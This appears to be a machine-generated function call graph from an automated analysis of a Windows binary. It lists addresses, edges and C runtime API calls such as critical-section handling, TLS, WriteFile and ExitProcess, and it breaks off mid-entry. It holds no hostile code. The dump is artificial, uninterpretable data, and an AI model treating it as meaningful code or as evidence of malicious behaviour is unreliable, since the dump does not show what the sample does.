351e4f2f 7577->7586 7578 351e71c6 FreeEnvironmentStringsW 7578->7577 7580 351e56d0 21 API calls 7579->7580 7581 351e7192 7580->7581 7582 351e7199 WideCharToMultiByte 7581->7582 7583 351e71af 7581->7583 7582->7583 7584 351e571e 20 API calls 7583->7584 7584->7585 7585->7577 7585->7578 7587 351e4f44 7586->7587 7588 351e637b 20 API calls 7587->7588 7597 351e4f6b 7588->7597 7589 351e4fcf 7590 351e571e 20 API calls 7589->7590 7591 351e4fe9 7590->7591 7591->7571 7592 351e637b 20 API calls 7592->7597 7593 351e4fd1 7595 351e5000 20 API calls 7593->7595 7594 351e544d 26 API calls 7594->7597 7596 351e4fd7 7595->7596 7599 351e571e 20 API calls 7596->7599 7597->7589 7597->7592 7597->7593 7597->7594 7598 351e4ff3 7597->7598 7601 351e571e 20 API calls 7597->7601 7600 351e62bc 11 API calls 7598->7600 7599->7589 7602 351e4fff 7600->7602 7601->7597 7603 351e73d5 7604 351e73e1 7603->7604 7615 351e5671 RtlEnterCriticalSection 7604->7615 7606 351e73e8 7607 351e8be3 27 API calls 7606->7607 7608 351e73f7 7607->7608 7614 351e7406 7608->7614 7616 351e7269 GetStartupInfoW 7608->7616 7612 351e7417 7627 351e7422 7614->7627 7615->7606 7617 351e7318 7616->7617 7618 351e7286 7616->7618 7622 351e731f 7617->7622 7618->7617 7619 351e8be3 27 API calls 7618->7619 7620 351e72af 7619->7620 7620->7617 7621 351e72dd GetFileType 7620->7621 7621->7620 7623 351e7326 7622->7623 7624 351e7369 GetStdHandle 7623->7624 7625 351e73d1 7623->7625 7626 351e737c GetFileType 7623->7626 7624->7623 7625->7614 7626->7623 7630 351e56b9 RtlLeaveCriticalSection 7627->7630 7629 351e7429 7629->7612 7630->7629 7252 351e3c90 RtlUnwind 7631 351e36d0 7632 351e36e2 7631->7632 7634 351e36f0 7631->7634 7633 351e2ada 5 API calls 7632->7633 7633->7634 6682 351e5351 6683 351e5374 6682->6683 6684 351e5360 6682->6684 6685 351e571e 20 API calls 6683->6685 6684->6683 6686 351e571e 20 API calls 6684->6686 6687 351e5386 6685->6687 6686->6683 6688 351e571e 20 API calls 6687->6688 6689 351e5399 6688->6689 6690 351e571e 20 API calls 6689->6690 6691 351e53aa 6690->6691 6692 351e571e 20 API calls 6691->6692 6693 351e53bb 6692->6693 6694 351e724e GetProcessHeap 6695 351e284f 6696 351e2882 27 API calls 6695->6696 6697 351e285d 6696->6697 6106 351e220c 6107 351e221a 6106->6107 6108 351e2215 6106->6108 6116 351e20db 6107->6116 6112 351e22b1 6108->6112 6111 351e2228 6113 351e22c7 6112->6113 6115 351e22d0 6113->6115 6124 351e2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6113->6124 6115->6107 6117 351e20e7 6116->6117 6120 351e210b 6117->6120 6123 351e20f6 6117->6123 6125 351e1eec 6117->6125 6119 351e216d 6121 351e1eec 50 API calls 6119->6121 6119->6123 6120->6119 6122 351e1eec 50 API calls 6120->6122 6120->6123 6121->6123 6122->6119 6123->6111 6124->6115 6126 351e1f2a 6125->6126 6127 351e1ef7 6125->6127 6168 351e2049 6126->6168 6128 351e1f1c 6127->6128 6129 351e1efc 6127->6129 6150 351e1f3f 6128->6150 6131 351e1f12 6129->6131 6133 351e1f01 6129->6133 6142 351e23ec 6131->6142 6135 351e1f06 6133->6135 6137 351e240b 6133->6137 6135->6120 6182 351e53e5 6137->6182 6291 351e3513 6142->6291 6145 351e23f5 6145->6135 6148 351e2408 6148->6135 6149 351e351e 7 API calls 6149->6145 6151 351e1f4b 6150->6151 6309 351e247c 6151->6309 6153 351e1f57 6153->6135 6154 351e1f52 6154->6153 6155 351e1f7c 6154->6155 6156 351e2041 6154->6156 6320 351e23de 6155->6320 6336 351e2639 IsProcessorFeaturePresent 6156->6336 6159 351e2048 6160 351e1f8b 6160->6153 6323 351e22fc RtlInitializeSListHead 6160->6323 6162 351e1f99 6324 351e46c5 6162->6324 6166 351e1fb8 6166->6153 6332 351e4669 6166->6332 6170 351e2055 6168->6170 6169 351e205e 6169->6135 6170->6169 6171 351e207d 6170->6171 6172 351e20d3 6170->6172 6413 351e244c 6171->6413 6173 351e2639 4 API calls 6172->6173 6176 351e20da 6173->6176 6175 351e2082 6422 351e2308 6175->6422 6178 351e2087 6425 351e20c4 6178->6425 6180 351e209f 6428 351e260b 6180->6428 6188 351e5aca 6182->6188 6185 351e351e 6262 351e3820 6185->6262 6187 351e2415 6187->6135 6189 351e5ad4 6188->6189 6190 351e2410 6188->6190 6191 351e5e08 11 API calls 6189->6191 6190->6185 6192 351e5adb 6191->6192 6192->6190 6193 351e5e5e 11 API calls 6192->6193 6194 351e5aee 6193->6194 6196 351e59b5 6194->6196 6197 351e59d0 6196->6197 6198 351e59c0 6196->6198 6197->6190 6202 351e59d6 6198->6202 6201 351e571e 20 API calls 6201->6197 6203 351e59e9 6202->6203 6204 351e59ef 6202->6204 6205 351e571e 20 API calls 6203->6205 6206 351e571e 20 API calls 6204->6206 6205->6204 6207 351e59fb 6206->6207 6208 351e571e 20 API calls 6207->6208 6209 351e5a06 6208->6209 6210 351e571e 20 API calls 6209->6210 6211 351e5a11 6210->6211 6212 351e571e 20 API calls 6211->6212 6213 351e5a1c 6212->6213 6214 351e571e 20 API calls 6213->6214 6215 351e5a27 6214->6215 6216 351e571e 20 API calls 6215->6216 6217 351e5a32 6216->6217 6218 351e571e 20 API calls 6217->6218 6219 351e5a3d 6218->6219 6220 351e571e 20 API calls 6219->6220 6221 351e5a48 6220->6221 6222 351e571e 20 API calls 6221->6222 6223 351e5a56 6222->6223 6228 351e589c 6223->6228 6234 351e57a8 6228->6234 6230 351e58c0 6231 351e58ec 6230->6231 6246 351e5809 6231->6246 6233 351e5910 6233->6201 6235 351e57b4 6234->6235 6242 351e5671 RtlEnterCriticalSection 6235->6242 6237 351e57be 6240 351e571e 20 API calls 6237->6240 6241 351e57e8 6237->6241 6239 351e57f5 6239->6230 6240->6241 6243 351e57fd 6241->6243 6242->6237 6244 351e56b9 RtlLeaveCriticalSection 6243->6244 6245 351e5807 6244->6245 6245->6239 6247 351e5815 6246->6247 6254 351e5671 RtlEnterCriticalSection 6247->6254 6249 351e581f 6255 351e5a7f 6249->6255 6251 351e5832 6259 351e5848 6251->6259 6253 351e5840 6253->6233 6254->6249 6256 351e5ab5 6255->6256 6257 351e5a8e 6255->6257 6256->6251 6257->6256 6258 351e7cc2 20 API calls 6257->6258 6258->6256 6260 351e56b9 RtlLeaveCriticalSection 6259->6260 6261 351e5852 6260->6261 6261->6253 6263 351e382d 6262->6263 6267 351e384b 6262->6267 6264 351e383b 6263->6264 6268 351e3b67 6263->6268 6273 351e3ba2 6264->6273 6267->6187 6278 351e3a82 6268->6278 6270 351e3b81 6271 351e3b99 TlsGetValue 6270->6271 6272 351e3b8d 6270->6272 6271->6272 6272->6264 6274 351e3a82 5 API calls 6273->6274 6275 351e3bbc 6274->6275 6276 351e3bd7 TlsSetValue 6275->6276 6277 351e3bcb 6275->6277 6276->6277 6277->6267 6279 351e3aaa 6278->6279 6283 351e3aa6 6278->6283 6279->6283 6284 351e39be 6279->6284 6282 351e3ac4 GetProcAddress 6282->6283 6283->6270 6285 351e39cd 6284->6285 6286 351e39ea LoadLibraryExW 6285->6286 6288 351e3a60 FreeLibrary 6285->6288 6289 351e3a77 6285->6289 6290 351e3a38 LoadLibraryExW 6285->6290 6286->6285 6287 351e3a05 GetLastError 6286->6287 6287->6285 6288->6285 6289->6282 6289->6283 6290->6285 6297 351e3856 6291->6297 6293 351e23f1 6293->6145 6294 351e53da 6293->6294 6295 351e5b7a 20 API calls 6294->6295 6296 351e23fd 6295->6296 6296->6148 6296->6149 6298 351e385f 6297->6298 6299 351e3862 GetLastError 6297->6299 6298->6293 6300 351e3b67 6 API calls 6299->6300 6301 351e3877 6300->6301 6302 351e38dc SetLastError 6301->6302 6303 351e3ba2 6 API calls 6301->6303 6308 351e3896 6301->6308 6302->6293 6304 351e3890 6303->6304 6305 351e3ba2 6 API calls 6304->6305 6307 351e38b8 6304->6307 6304->6308 6305->6307 6306 351e3ba2 6 API calls 6306->6308 6307->6306 6307->6308 6308->6302 6310 351e2485 6309->6310 6340 351e2933 IsProcessorFeaturePresent 6310->6340 6314 351e2496 6315 351e249a 6314->6315 6351 351e53c8 6314->6351 6315->6154 6318 351e24b1 6318->6154 6407 351e24b5 6320->6407 6322 351e23e5 6322->6160 6323->6162 6325 351e46dc 6324->6325 6326 351e2ada 5 API calls 6325->6326 6327 351e1fad 6326->6327 6327->6153 6328 351e23b3 6327->6328 6329 351e23b8 6328->6329 6330 351e2933 IsProcessorFeaturePresent 6329->6330 6331 351e23c1 6329->6331 6330->6331 6331->6166 6333 351e4698 6332->6333 6334 351e2ada 5 API calls 6333->6334 6335 351e46c1 6334->6335 6335->6153 6337 351e264e 6336->6337 6338 351e26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6337->6338 6339 351e2744 6338->6339 6339->6159 6341 351e2491 6340->6341 6342 351e34ea 6341->6342 6343 351e34ef 6342->6343 6362 351e3936 6343->6362 6347 351e3505 6348 351e3510 6347->6348 6376 351e3972 6347->6376 6348->6314 6350 351e34fd 6350->6314 6399 351e7457 6351->6399 6354 351e3529 6355 351e3543 6354->6355 6356 351e3532 6354->6356 6355->6315 6357 351e391b 6 API calls 6356->6357 6358 351e3537 6357->6358 6359 351e3972 RtlDeleteCriticalSection 6358->6359 6360 351e353c 6359->6360 6403 351e3c50 6360->6403 6363 351e393f 6362->6363 6365 351e3968 6363->6365 6367 351e34f9 6363->6367 6380 351e3be0 6363->6380 6366 351e3972 RtlDeleteCriticalSection 6365->6366 6366->6367 6367->6350 6368 351e38e8 6367->6368 6385 351e3af1 6368->6385 6370 351e38fd 6370->6347 6372 351e3ba2 6 API calls 6373 351e390b 6372->6373 6374 351e3918 6373->6374 6390 351e391b 6373->6390 6374->6347 6377 351e399c 6376->6377 6378 351e397d 6376->6378 6377->6350 6379 351e3987 RtlDeleteCriticalSection 6378->6379 6379->6377 6379->6379 6381 351e3a82 5 API calls 6380->6381 6382 351e3bfa 6381->6382 6383 351e3c18 InitializeCriticalSectionAndSpinCount 6382->6383 6384 351e3c03 6382->6384 6383->6384 6384->6363 6386 351e3a82 5 API calls 6385->6386 6387 351e3b0b 6386->6387 6388 351e3b24 TlsAlloc 6387->6388 6389 351e38f2 6387->6389 6389->6370 6389->6372 6391 351e3925 6390->6391 6392 351e392b 6390->6392 6394 351e3b2c 6391->6394 6392->6370 6395 351e3a82 5 API calls 6394->6395 6396 351e3b46 6395->6396 6397 351e3b5e TlsFree 6396->6397 6398 351e3b52 6396->6398 6397->6398 6398->6392 6402 351e7470 6399->6402 6400 351e2ada 5 API calls 6401 351e24a3 6400->6401 6401->6318 6401->6354 6402->6400 6404 351e3c59 6403->6404 6406 351e3c7f 6403->6406 6405 351e3c69 FreeLibrary 6404->6405 6404->6406 6405->6404 6406->6355 6408 351e24c8 6407->6408 6409 351e24c4 6407->6409 6410 351e24d5 6408->6410 6411 351e2639 4 API calls 6408->6411 6409->6322 6410->6322 6412 351e2559 6411->6412 6414 351e2451 6413->6414 6415 351e2455 6414->6415 6419 351e2461 6414->6419 6434 351e527a 6415->6434 6418 351e246e 6418->6175 6419->6418 6437 351e499b 6419->6437 6512 351e34c7 RtlInterlockedFlushSList 6422->6512 6424 351e2312 6424->6178 6514 351e246f 6425->6514 6427 351e20c9 6427->6180 6429 351e2617 6428->6429 6433 351e262d 6429->6433 6533 351e53ed 6429->6533 6432 351e3529 8 API calls 6432->6433 6433->6169 6459 351e5132 6434->6459 6438 351e49a7 6437->6438 6439 351e49bf 6438->6439 6481 351e4af5 GetModuleHandleW 6438->6481 6490 351e5671 RtlEnterCriticalSection 6439->6490 6446 351e49c7 6449 351e4a3c 6446->6449 6451 351e527a 20 API calls 6446->6451 6458 351e4a65 6446->6458 6447 351e4aae 6502 351ebdc9 6447->6502 6448 351e4a82 6494 351e4ab4 6448->6494 6453 351e4669 5 API calls 6449->6453 6457 351e4a54 6449->6457 6451->6449 6453->6457 6454 351e4669 5 API calls 6454->6458 6457->6454 6491 351e4aa5 6458->6491 6462 351e50e1 6459->6462 6461 351e245f 6461->6175 6463 351e50ed 6462->6463 6470 351e5671 RtlEnterCriticalSection 6463->6470 6465 351e50fb 6471 351e515a 6465->6471 6469 351e5119 6469->6461 6470->6465 6472 351e517a 6471->6472 6476 351e5182 6471->6476 6473 351e2ada 5 API calls 6472->6473 6474 351e5108 6473->6474 6477 351e5126 6474->6477 6475 351e571e 20 API calls 6475->6472 6476->6472 6476->6475 6480 351e56b9 RtlLeaveCriticalSection 6477->6480 6479 351e5130 6479->6469 6480->6479 6482 351e49b3 6481->6482 6482->6439 6483 351e4b39 GetModuleHandleExW 6482->6483 6484 351e4b63 GetProcAddress 6483->6484 6485 351e4b78 6483->6485 6484->6485 6486 351e4b8c FreeLibrary 6485->6486 6487 351e4b95 6485->6487 6486->6487 6488 351e2ada 5 API calls 6487->6488 6489 351e4b9f 6488->6489 6489->6439 6490->6446 6505 351e56b9 RtlLeaveCriticalSection 6491->6505 6493 351e4a7e 6493->6447 6493->6448 6506 351e6025 6494->6506 6497 351e4ae2 6500 351e4b39 8 API calls 6497->6500 6498 351e4ac2 GetPEB 6498->6497 6499 351e4ad2 GetCurrentProcess TerminateProcess 6498->6499 6499->6497 6501 351e4aea ExitProcess 6500->6501 6503 351e2ada 5 API calls 6502->6503 6504 351ebdd4 6503->6504 6504->6504 6505->6493 6507 351e604a 6506->6507 6508 351e6040 6506->6508 6509 351e5c45 5 API calls 6507->6509 6510 351e2ada 5 API calls 6508->6510 6509->6508 6511 351e4abe 6510->6511 6511->6497 6511->6498 6513 351e34d7 6512->6513 6513->6424 6519 351e53ff 6514->6519 6517 351e391b 6 API calls 6518 351e354d 6517->6518 6518->6427 6522 351e5c2b 6519->6522 6523 351e5c35 6522->6523 6524 351e2476 6522->6524 6526 351e5db2 6523->6526 6524->6517 6527 351e5c45 5 API calls 6526->6527 6528 351e5dd9 6527->6528 6529 351e5df1 TlsFree 6528->6529 6532 351e5de5 6528->6532 6529->6532 6530 351e2ada 5 API calls 6531 351e5e02 6530->6531 6531->6524 6532->6530 6536 351e74da 6533->6536 6539 351e74f3 6536->6539 6537 351e2ada 5 API calls 6538 351e2625 6537->6538 6538->6432 6539->6537 6698 351e5348 6699 351e3529 8 API calls 6698->6699 6700 351e534f 6699->6700 6701 351e7b48 6711 351e8ebf 6701->6711 6705 351e7b55 6724 351e907c 6705->6724 6708 351e7b7f 6709 351e571e 20 API calls 6708->6709 6710 351e7b8a 6709->6710 6728 351e8ec8 6711->6728 6713 351e7b50 6714 351e8fdc 6713->6714 6715 351e8fe8 6714->6715 6748 351e5671 RtlEnterCriticalSection 6715->6748 6717 351e905e 6762 351e9073 6717->6762 6719 351e906a 6719->6705 6720 351e9032 RtlDeleteCriticalSection 6721 351e571e 20 API calls 6720->6721 6723 351e8ff3 6721->6723 6723->6717 6723->6720 6749 351ea09c 6723->6749 6725 351e7b64 RtlDeleteCriticalSection 6724->6725 6726 351e9092 6724->6726 6725->6705 6725->6708 6726->6725 6727 351e571e 20 API calls 6726->6727 6727->6725 6729 351e8ed4 6728->6729 6738 351e5671 RtlEnterCriticalSection 6729->6738 6731 351e8f77 6743 351e8f97 6731->6743 6735 351e8ee3 6735->6731 6737 351e8e78 66 API calls 6735->6737 6739 351e7b94 RtlEnterCriticalSection 6735->6739 6740 351e8f6d 6735->6740 6736 351e8f83 6736->6713 6737->6735 6738->6735 6739->6735 6746 351e7ba8 RtlLeaveCriticalSection 6740->6746 6742 351e8f75 6742->6735 6747 351e56b9 RtlLeaveCriticalSection 6743->6747 6745 351e8f9e 6745->6736 6746->6742 6747->6745 6748->6723 6750 351ea0a8 6749->6750 6751 351ea0ce 6750->6751 6752 351ea0b9 6750->6752 6761 351ea0c9 6751->6761 6765 351e7b94 RtlEnterCriticalSection 6751->6765 6753 351e6368 20 API calls 6752->6753 6754 351ea0be 6753->6754 6756 351e62ac 26 API calls 6754->6756 6756->6761 6757 351ea0ea 6766 351ea026 6757->6766 6759 351ea0f5 6782 351ea112 6759->6782 6761->6723 7046 351e56b9 RtlLeaveCriticalSection 6762->7046 6764 351e907a 6764->6719 6765->6757 6767 351ea048 6766->6767 6768 351ea033 6766->6768 6780 351ea043 6767->6780 6785 351e8e12 6767->6785 6769 351e6368 20 API calls 6768->6769 6771 351ea038 6769->6771 6773 351e62ac 26 API calls 6771->6773 6773->6780 6774 351e907c 20 API calls 6775 351ea064 6774->6775 6791 351e7a5a 6775->6791 6777 351ea06a 6798 351eadce 6777->6798 6780->6759 6781 351e571e 20 API calls 6781->6780 7045 351e7ba8 RtlLeaveCriticalSection 6782->7045 6784 351ea11a 6784->6761 6786 351e8e2a 6785->6786 6787 351e8e26 6785->6787 6786->6787 6788 351e7a5a 26 API calls 6786->6788 6787->6774 6789 351e8e4a 6788->6789 6813 351e9a22 6789->6813 6792 351e7a7b 6791->6792 6793 351e7a66 6791->6793 6792->6777 6794 351e6368 20 API calls 6793->6794 6795 351e7a6b 6794->6795 6796 351e62ac 26 API calls 6795->6796 6797 351e7a76 6796->6797 6797->6777 6799 351eaddd 6798->6799 6800 351eadf2 6798->6800 6802 351e6355 20 API calls 6799->6802 6801 351eae2d 6800->6801 6805 351eae19 6800->6805 6803 351e6355 20 API calls 6801->6803 6804 351eade2 6802->6804 6806 351eae32 6803->6806 6807 351e6368 20 API calls 6804->6807 7002 351eada6 6805->7002 6809 351e6368 20 API calls 6806->6809 6810 351ea070 6807->6810 6811 351eae3a 6809->6811 6810->6780 6810->6781 6812 351e62ac 26 API calls 6811->6812 6812->6810 6814 351e9a2e 6813->6814 6815 351e9a4e 6814->6815 6816 351e9a36 6814->6816 6817 351e9aec 6815->6817 6823 351e9a83 6815->6823 6838 351e6355 6816->6838 6819 351e6355 20 API calls 6817->6819 6822 351e9af1 6819->6822 6821 351e6368 20 API calls 6831 351e9a43 6821->6831 6824 351e6368 20 API calls 6822->6824 6841 351e8c7b RtlEnterCriticalSection 6823->6841 6826 351e9af9 6824->6826 6828 351e62ac 26 API calls 6826->6828 6827 351e9a89 6829 351e9aba 6827->6829 6830 351e9aa5 6827->6830 6828->6831 6842 351e9b0d 6829->6842 6832 351e6368 20 API calls 6830->6832 6831->6787 6834 351e9aaa 6832->6834 6836 351e6355 20 API calls 6834->6836 6835 351e9ab5 6893 351e9ae4 6835->6893 6836->6835 6839 351e5b7a 20 API calls 6838->6839 6840 351e635a 6839->6840 6840->6821 6841->6827 6843 351e9b3b 6842->6843 6880 351e9b34 6842->6880 6844 351e9b3f 6843->6844 6846 351e9b5e 6843->6846 6845 351e6355 20 API calls 6844->6845 6848 351e9b44 6845->6848 6849 351e9baf 6846->6849 6850 351e9b92 6846->6850 6847 351e2ada 5 API calls 6851 351e9d15 6847->6851 6852 351e6368 20 API calls 6848->6852 6853 351e9bc5 6849->6853 6896 351ea00b 6849->6896 6854 351e6355 20 API calls 6850->6854 6851->6835 6855 351e9b4b 6852->6855 6899 351e96b2 6853->6899 6858 351e9b97 6854->6858 6859 351e62ac 26 API calls 6855->6859 6861 351e6368 20 API calls 6858->6861 6859->6880 6864 351e9b9f 6861->6864 6862 351e9c0c 6866 351e9c66 WriteFile 6862->6866 6867 351e9c20 6862->6867 6863 351e9bd3 6868 351e9bf9 6863->6868 6869 351e9bd7 6863->6869 6865 351e62ac 26 API calls 6864->6865 6865->6880 6870 351e9c89 GetLastError 6866->6870 6875 351e9bef 6866->6875 6872 351e9c28 6867->6872 6873 351e9c56 6867->6873 6911 351e9492 GetConsoleCP 6868->6911 6874 351e9ccd 6869->6874 6906 351e9645 6869->6906 6870->6875 6876 351e9c2d 6872->6876 6877 351e9c46 6872->6877 6937 351e9728 6873->6937 6874->6880 6881 351e6368 20 API calls 6874->6881 6875->6874 6875->6880 6884 351e9ca9 6875->6884 6876->6874 6922 351e9807 6876->6922 6929 351e98f5 6877->6929 6880->6847 6883 351e9cf2 6881->6883 6886 351e6355 20 API calls 6883->6886 6887 351e9cc4 6884->6887 6888 351e9cb0 6884->6888 6886->6880 6944 351e6332 6887->6944 6889 351e6368 20 API calls 6888->6889 6891 351e9cb5 6889->6891 6892 351e6355 20 API calls 6891->6892 6892->6880 7001 351e8c9e RtlLeaveCriticalSection 6893->7001 6895 351e9aea 6895->6831 6949 351e9f8d 6896->6949 6971 351e8dbc 6899->6971 6901 351e96c2 6902 351e96c7 6901->6902 6903 351e5af6 38 API calls 6901->6903 6902->6862 6902->6863 6904 351e96ea 6903->6904 6904->6902 6905 351e9708 GetConsoleMode 6904->6905 6905->6902 6907 351e966a 6906->6907 6908 351e969f 6906->6908 6907->6908 6909 351ea181 WriteConsoleW CreateFileW 6907->6909 6910 351e96a1 GetLastError 6907->6910 6908->6875 6909->6907 6910->6908 6916 351e9607 6911->6916 6920 351e94f5 6911->6920 6912 351e2ada 5 API calls 6914 351e9641 6912->6914 6914->6875 6915 351e79e6 40 API calls 6915->6920 6916->6912 6917 351e957b WideCharToMultiByte 6917->6916 6918 351e95a1 WriteFile 6917->6918 6919 351e962a GetLastError 6918->6919 6918->6920 6919->6916 6920->6915 6920->6916 6920->6917 6921 351e95d2 WriteFile 6920->6921 6980 351e7c19 6920->6980 6921->6919 6921->6920 6923 351e9816 6922->6923 6924 351e98d8 6923->6924 6925 351e9894 WriteFile 6923->6925 6926 351e2ada 5 API calls 6924->6926 6925->6923 6927 351e98da GetLastError 6925->6927 6928 351e98f1 6926->6928 6927->6924 6928->6875 6936 351e9904 6929->6936 6930 351e9a0f 6931 351e2ada 5 API calls 6930->6931 6932 351e9a1e 6931->6932 6932->6875 6933 351e9986 WideCharToMultiByte 6934 351e99bb WriteFile 6933->6934 6935 351e9a07 GetLastError 6933->6935 6934->6935 6934->6936 6935->6930 6936->6930 6936->6933 6936->6934 6938 351e9737 6937->6938 6939 351e97ea 6938->6939 6940 351e97a9 WriteFile 6938->6940 6941 351e2ada 5 API calls 6939->6941 6940->6938 6943 351e97ec GetLastError 6940->6943 6942 351e9803 6941->6942 6942->6875 6943->6939 6945 351e6355 20 API calls 6944->6945 6946 351e633d 6945->6946 6947 351e6368 20 API calls 6946->6947 6948 351e6350 6947->6948 6948->6880 6958 351e8d52 6949->6958 6951 351e9f9f 6952 351e9fb8 SetFilePointerEx 6951->6952 6953 351e9fa7 6951->6953 6955 351e9fd0 GetLastError 6952->6955 6957 351e9fac 6952->6957 6954 351e6368 20 API calls 6953->6954 6954->6957 6956 351e6332 20 API calls 6955->6956 6956->6957 6957->6853 6959 351e8d5f 6958->6959 6960 351e8d74 6958->6960 6961 351e6355 20 API calls 6959->6961 6963 351e6355 20 API calls 6960->6963 6965 351e8d99 6960->6965 6962 351e8d64 6961->6962 6964 351e6368 20 API calls 6962->6964 6966 351e8da4 6963->6966 6968 351e8d6c 6964->6968 6965->6951 6967 351e6368 20 API calls 6966->6967 6969 351e8dac 6967->6969 6968->6951 6970 351e62ac 26 API calls 6969->6970 6970->6968 6972 351e8dc9 6971->6972 6974 351e8dd6 6971->6974 6973 351e6368 20 API calls 6972->6973 6975 351e8dce 6973->6975 6976 351e8de2 6974->6976 6977 351e6368 20 API calls 6974->6977 6975->6901 6976->6901 6978 351e8e03 6977->6978 6979 351e62ac 26 API calls 6978->6979 6979->6975 6981 351e5af6 38 API calls 6980->6981 6982 351e7c24 6981->6982 6985 351e7a00 6982->6985 6986 351e7a13 6985->6986 6988 351e7a28 6985->6988 6986->6988 6989 351e7f0f 6986->6989 6988->6920 6990 351e7f1b 6989->6990 6991 351e5af6 38 API calls 6990->6991 6992 351e7f24 6991->6992 6993 351e7f72 6992->6993 6994 351e5671 RtlEnterCriticalSection 6992->6994 6993->6988 6995 351e7f42 6994->6995 6996 351e7f86 20 API calls 6995->6996 6997 351e7f56 6996->6997 6998 351e7f75 RtlLeaveCriticalSection 6997->6998 6999 351e7f69 6998->6999 6999->6993 7000 351e55a8 38 API calls 6999->7000 7000->6993 7001->6895 7005 351ead24 7002->7005 7004 351eadca 7004->6810 7006 351ead30 7005->7006 7016 351e8c7b RtlEnterCriticalSection 7006->7016 7008 351ead3e 7009 351ead65 7008->7009 7010 351ead70 7008->7010 7017 351eae4d 7009->7017 7012 351e6368 20 API calls 7010->7012 7013 351ead6b 7012->7013 7032 351ead9a 7013->7032 7015 351ead8d 7015->7004 7016->7008 7018 351e8d52 26 API calls 7017->7018 7021 351eae5d 7018->7021 7019 351eae63 7035 351e8cc1 7019->7035 7021->7019 7024 351e8d52 26 API calls 7021->7024 7031 351eae95 7021->7031 7022 351e8d52 26 API calls 7025 351eaea1 CloseHandle 7022->7025 7026 351eae8c 7024->7026 7025->7019 7028 351eaead GetLastError 7025->7028 7027 351e8d52 26 API calls 7026->7027 7027->7031 7028->7019 7029 351e6332 20 API calls 7030 351eaedd 7029->7030 7030->7013 7031->7019 7031->7022 7044 351e8c9e RtlLeaveCriticalSection 7032->7044 7034 351eada4 7034->7015 7036 351e8d37 7035->7036 7037 351e8cd0 7035->7037 7038 351e6368 20 API calls 7036->7038 7037->7036 7043 351e8cfa 7037->7043 7039 351e8d3c 7038->7039 7040 351e6355 20 API calls 7039->7040 7041 351e8d27 7040->7041 7041->7029 7041->7030 7042 351e8d21 SetStdHandle 7042->7041 7043->7041 7043->7042 7044->7034 7045->6784 7046->6764 7257 351e8a89 7260 351e6d60 7257->7260 7261 351e6d69 7260->7261 7263 351e6d72 7260->7263 7264 351e6c5f 7261->7264 7265 351e5af6 38 API calls 7264->7265 7266 351e6c6c 7265->7266 7267 351e6d7e 38 API calls 7266->7267 7268 351e6c74 7267->7268 7284 351e69f3 7268->7284 7271 351e6c8b 7271->7263 7274 351e6cce 7277 351e571e 20 API calls 7274->7277 7277->7271 7278 351e6cc9 7279 351e6368 20 API calls 7278->7279 7279->7274 7280 351e6d12 7280->7274 7308 351e68c9 7280->7308 7281 351e6ce6 7281->7280 7282 351e571e 20 API calls 7281->7282 7282->7280 7285 351e54a7 38 API calls 7284->7285 7286 351e6a05 7285->7286 7287 351e6a26 7286->7287 7288 351e6a14 GetOEMCP 7286->7288 7289 351e6a3d 7287->7289 7290 351e6a2b GetACP 7287->7290 7288->7289 7289->7271 7291 351e56d0 7289->7291 7290->7289 7292 351e570e 7291->7292 7296 351e56de 7291->7296 7294 351e6368 20 API calls 7292->7294 7293 351e56f9 RtlAllocateHeap 7295 351e570c 7293->7295 7293->7296 7294->7295 7295->7274 7298 351e6e20 7295->7298 7296->7292 7296->7293 7297 351e474f 7 API calls 7296->7297 7297->7296 7299 351e69f3 40 API calls 7298->7299 7300 351e6e3f 7299->7300 7303 351e6e90 IsValidCodePage 7300->7303 7305 351e6e46 7300->7305 7307 351e6eb5 7300->7307 7301 351e2ada 5 API calls 7302 351e6cc1 7301->7302 7302->7278 7302->7281 7304 351e6ea2 GetCPInfo 7303->7304 7303->7305 7304->7305 7304->7307 7305->7301 7311 351e6acb GetCPInfo 7307->7311 7384 351e6886 7308->7384 7310 351e68ed 7310->7274 7312 351e6baf 7311->7312 7313 351e6b05 7311->7313 7315 351e2ada 5 API calls 7312->7315 7321 351e86e4 7313->7321 7318 351e6c5b 7315->7318 7318->7305 7320 351e8a3e 43 API calls 7320->7312 7322 351e54a7 38 API calls 7321->7322 7323 351e8704 MultiByteToWideChar 7322->7323 7325 351e8742 7323->7325 7326 351e87da 7323->7326 7327 351e8763 7325->7327 7331 351e56d0 21 API calls 7325->7331 7328 351e2ada 5 API calls 7326->7328 7330 351e87d4 7327->7330 7333 351e87a8 MultiByteToWideChar 7327->7333 7329 351e6b66 7328->7329 7335 351e8a3e 7329->7335 7340 351e8801 7330->7340 7331->7327 7333->7330 7334 351e87c4 GetStringTypeW 7333->7334 7334->7330 7336 351e54a7 38 API calls 7335->7336 7337 351e8a51 7336->7337 7344 351e8821 7337->7344 7341 351e881e 7340->7341 7342 351e880d 7340->7342 7341->7326 7342->7341 7343 351e571e 20 API calls 7342->7343 7343->7341 7345 351e883c 7344->7345 7346 351e8862 MultiByteToWideChar 7345->7346 7347 351e888c 7346->7347 7348 351e8a16 7346->7348 7351 351e56d0 21 API calls 7347->7351 7354 351e88ad 7347->7354 7349 351e2ada 5 API calls 7348->7349 7350 351e6b87 7349->7350 7350->7320 7351->7354 7352 351e8962 7357 351e8801 20 API calls 7352->7357 7353 351e88f6 MultiByteToWideChar 7353->7352 7355 351e890f 7353->7355 7354->7352 7354->7353 7371 351e5f19 7355->7371 7357->7348 7359 351e8939 7359->7352 7363 351e5f19 11 API calls 7359->7363 7360 351e8971 7361 351e56d0 21 API calls 7360->7361 7366 351e8992 7360->7366 7361->7366 7362 351e8a07 7365 351e8801 20 API calls 7362->7365 7363->7352 7364 351e5f19 11 API calls 7367 351e89e6 7364->7367 7365->7352 7366->7362 7366->7364 7367->7362 7368 351e89f5 WideCharToMultiByte 7367->7368 7368->7362 7369 351e8a35 7368->7369 7370 351e8801 20 API calls 7369->7370 7370->7352 7372 351e5c45 5 API calls 7371->7372 7373 351e5f40 7372->7373 7377 351e5f49 7373->7377 7379 351e5fa1 7373->7379 7376 351e2ada 5 API calls 7378 351e5f9b 7376->7378 7377->7376 7378->7352 7378->7359 7378->7360 7380 351e5c45 5 API calls 7379->7380 7381 351e5fc8 7380->7381 7382 351e2ada 5 API calls 7381->7382 7383 351e5f89 LCMapStringW 7382->7383 7383->7377 7385 351e6892 7384->7385 7392 351e5671 RtlEnterCriticalSection 7385->7392 7387 351e689c 7393 351e68f1 7387->7393 7391 351e68b5 7391->7310 7392->7387 7405 